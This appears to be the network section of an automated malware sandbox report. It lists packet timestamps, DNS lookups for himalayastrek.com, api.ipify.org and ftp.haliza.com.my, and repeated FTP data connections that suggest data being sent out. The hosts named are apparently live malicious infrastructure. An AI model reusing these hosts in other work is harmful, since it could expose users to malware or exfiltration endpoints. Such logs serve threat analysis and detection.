                                                                                            Oct 30, 2024 08:35:29.800309896 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:29.800409079 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:29.801245928 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:29.801352978 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:29.802164078 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:29.802282095 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:29.802952051 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:29.803052902 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:29.803956032 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:29.804085970 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:29.804897070 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:29.804965973 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:29.832775116 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:29.832910061 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:29.917181015 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:29.917464972 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:29.917738914 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:29.917886019 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:29.918204069 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:29.918417931 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:29.918910980 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:29.918998003 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:29.919090986 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:29.919193029 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:29.919878960 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:29.919953108 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:29.920747995 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:29.920818090 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:29.920907021 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:29.921041965 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:29.921766043 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:29.921839952 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:29.922601938 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:29.922682047 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:29.922702074 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:29.922771931 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:29.923571110 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:29.923655987 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:29.949609041 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:29.949752092 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:29.949805021 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:29.949805021 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:29.949831963 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:29.949876070 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.034760952 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.034895897 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.034926891 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.034941912 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.034986019 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.034986019 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.035037994 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.035101891 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.035219908 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.035300016 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.035446882 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.035599947 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.035624981 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.035731077 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.035762072 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.035856009 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.035887957 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.035981894 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.036065102 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.036173105 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.042068005 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.042176962 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.042198896 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.042295933 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.042433977 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.042537928 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.042623997 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.042743921 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.042840958 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.042907000 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.042968035 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.043057919 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.043104887 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.043190956 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.043230057 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.043294907 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.043404102 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.043489933 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.043582916 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.043677092 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.043732882 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.043803930 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.043946981 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.044050932 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.044135094 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.044233084 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.044280052 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.044404984 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.066452980 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.066557884 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.066797972 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.066864014 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.067122936 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.067193985 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.067419052 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.067512035 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.067601919 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.067740917 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.067800045 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.067873955 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.151396036 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.151546955 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.151582003 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.151691914 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.151725054 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.151937962 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.152004957 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.152019024 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.152043104 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.152103901 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.152103901 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.152113914 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.152184963 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.152267933 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.152273893 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.152287006 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.152431011 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.152434111 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.152446032 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.152503014 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.152507067 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.152518988 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.152599096 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.152657986 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.152657986 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.152664900 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.152918100 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.153189898 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.153239965 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.153247118 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.153310061 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.153367996 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.153367996 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.153376102 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.153455019 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.153626919 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.153635979 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.153750896 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.153834105 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.153934002 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.153961897 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.154102087 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.154107094 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.154125929 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.154169083 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.154175997 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.154249907 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.154249907 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.154256105 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.154478073 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.154582024 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.154582024 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.154587984 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.154661894 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.154802084 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.154808044 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.154913902 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.155013084 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.155072927 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.155072927 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.155078888 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.155148983 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.155153036 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.155179977 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.155230045 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.155230045 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.155278921 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.155350924 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.155426979 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.155493975 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.155507088 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.155551910 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.155720949 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.155831099 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.155900002 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.155982971 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.156069040 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.156125069 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.156192064 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.156286001 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.156416893 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.156491995 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.156497955 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.156558990 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.156769991 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.156889915 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.156894922 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.157099009 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.184039116 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.184145927 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.184159040 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.184288979 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.184290886 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.184303999 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.184380054 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.184474945 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.184581041 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.184588909 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.184597969 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.184664011 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.184755087 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.184755087 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:30.184775114 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:30.184787989 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:33.895411015 CET49752443192.168.2.4172.67.74.152
                                                                                            Oct 30, 2024 08:35:33.895461082 CET44349752172.67.74.152192.168.2.4
                                                                                            Oct 30, 2024 08:35:33.895536900 CET49752443192.168.2.4172.67.74.152
                                                                                            Oct 30, 2024 08:35:33.914436102 CET49752443192.168.2.4172.67.74.152
                                                                                            Oct 30, 2024 08:35:33.914453983 CET44349752172.67.74.152192.168.2.4
                                                                                            Oct 30, 2024 08:35:34.510683060 CET44349752172.67.74.152192.168.2.4
                                                                                            Oct 30, 2024 08:35:34.510772943 CET49752443192.168.2.4172.67.74.152
                                                                                            Oct 30, 2024 08:35:34.513371944 CET49752443192.168.2.4172.67.74.152
                                                                                            Oct 30, 2024 08:35:34.513382912 CET44349752172.67.74.152192.168.2.4
                                                                                            Oct 30, 2024 08:35:34.513637066 CET44349752172.67.74.152192.168.2.4
                                                                                            Oct 30, 2024 08:35:34.558032990 CET49752443192.168.2.4172.67.74.152
                                                                                            Oct 30, 2024 08:35:34.601265907 CET49752443192.168.2.4172.67.74.152
                                                                                            Oct 30, 2024 08:35:34.643332005 CET44349752172.67.74.152192.168.2.4
                                                                                            Oct 30, 2024 08:35:34.782532930 CET44349752172.67.74.152192.168.2.4
                                                                                            Oct 30, 2024 08:35:34.782598972 CET44349752172.67.74.152192.168.2.4
                                                                                            Oct 30, 2024 08:35:34.782681942 CET49752443192.168.2.4172.67.74.152
                                                                                            Oct 30, 2024 08:35:34.785646915 CET49752443192.168.2.4172.67.74.152
                                                                                            Oct 30, 2024 08:35:35.570503950 CET4974421192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:36.443223953 CET4975321192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:36.448817968 CET2149753110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:36.448945999 CET4975321192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:37.338639975 CET2149753110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:37.340873957 CET4975321192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:37.346323967 CET2149753110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:37.670998096 CET2149753110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:37.675668001 CET4975321192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:37.681189060 CET2149753110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:38.028072119 CET2149753110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:38.032543898 CET4975321192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:38.037938118 CET2149753110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:38.361502886 CET2149753110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:38.361772060 CET4975321192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:38.367252111 CET2149753110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:38.690716982 CET2149753110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:38.690996885 CET4975321192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:38.696886063 CET2149753110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:39.021226883 CET2149753110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:39.021478891 CET4975321192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:39.026905060 CET2149753110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:39.351174116 CET2149753110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:39.351985931 CET4975463940192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:39.357518911 CET6394049754110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:39.357601881 CET4975463940192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:39.357736111 CET4975321192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:39.363042116 CET2149753110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:40.259845018 CET2149753110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:40.260221004 CET4975463940192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:40.260267973 CET4975463940192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:40.265875101 CET6394049754110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:40.266782045 CET6394049754110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:40.266851902 CET4975463940192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:40.308031082 CET4975321192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:40.590024948 CET2149753110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:40.636121035 CET4975321192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:40.647682905 CET4975321192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:40.653620005 CET2149753110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:40.984262943 CET2149753110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:40.984822035 CET4975562962192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:40.990307093 CET6296249755110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:40.990403891 CET4975562962192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:40.990443945 CET4975321192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:40.996068001 CET2149753110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:41.894920111 CET2149753110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:41.895308971 CET4975562962192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:41.895308971 CET4975562962192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:41.901073933 CET6296249755110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:41.901087999 CET6296249755110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:41.901103973 CET6296249755110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:41.901438951 CET6296249755110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:41.901724100 CET4975562962192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:41.948618889 CET4975321192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:42.226413965 CET2149753110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:42.226949930 CET4975321192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:42.232472897 CET2149753110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:42.556190014 CET2149753110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:42.556967974 CET4975661195192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:42.562568903 CET6119549756110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:42.562688112 CET4975661195192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:42.562902927 CET4975321192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:42.569364071 CET2149753110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:43.476490974 CET2149753110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:43.476799965 CET4975661195192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:43.482424974 CET6119549756110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:43.482485056 CET4975661195192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:43.527187109 CET4975321192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:43.807782888 CET2149753110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:43.854862928 CET4975321192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:37:04.723928928 CET4975321192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:37:04.729396105 CET2149753110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:37:05.052964926 CET2149753110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:37:05.053494930 CET5002353369192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:37:05.059182882 CET5336950023110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:37:05.059283018 CET5002353369192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:37:05.059341908 CET4975321192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:37:05.064853907 CET2149753110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:37:05.959093094 CET2149753110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:37:06.011368990 CET4975321192.168.2.4110.4.45.197

                                                                                            UDP Packets

                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Oct 30, 2024 08:34:57.991049051 CET5006253192.168.2.41.1.1.1
                                                                                            Oct 30, 2024 08:34:57.998430967 CET53500621.1.1.1192.168.2.4
                                                                                            Oct 30, 2024 08:35:06.129019976 CET6547253192.168.2.41.1.1.1
                                                                                            Oct 30, 2024 08:35:06.136702061 CET53654721.1.1.1192.168.2.4
                                                                                            Oct 30, 2024 08:35:08.273344994 CET6079853192.168.2.41.1.1.1
                                                                                            Oct 30, 2024 08:35:08.528871059 CET53607981.1.1.1192.168.2.4

                                                                                            DNS Queries

                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                            Oct 30, 2024 08:34:57.991049051 CET192.168.2.41.1.1.10xef98Standard query (0)himalayastrek.comA (IP address)IN (0x0001)false
                                                                                            Oct 30, 2024 08:35:06.129019976 CET192.168.2.41.1.1.10x714Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                            Oct 30, 2024 08:35:08.273344994 CET192.168.2.41.1.1.10x9affStandard query (0)ftp.haliza.com.myA (IP address)IN (0x0001)false

                                                                                            DNS Answers

                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                            Oct 30, 2024 08:34:57.998430967 CET1.1.1.1192.168.2.40xef98No error (0)himalayastrek.com50.116.93.185A (IP address)IN (0x0001)false
                                                                                            Oct 30, 2024 08:35:06.136702061 CET1.1.1.1192.168.2.40x714No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                            Oct 30, 2024 08:35:06.136702061 CET1.1.1.1192.168.2.40x714No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                            Oct 30, 2024 08:35:06.136702061 CET1.1.1.1192.168.2.40x714No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
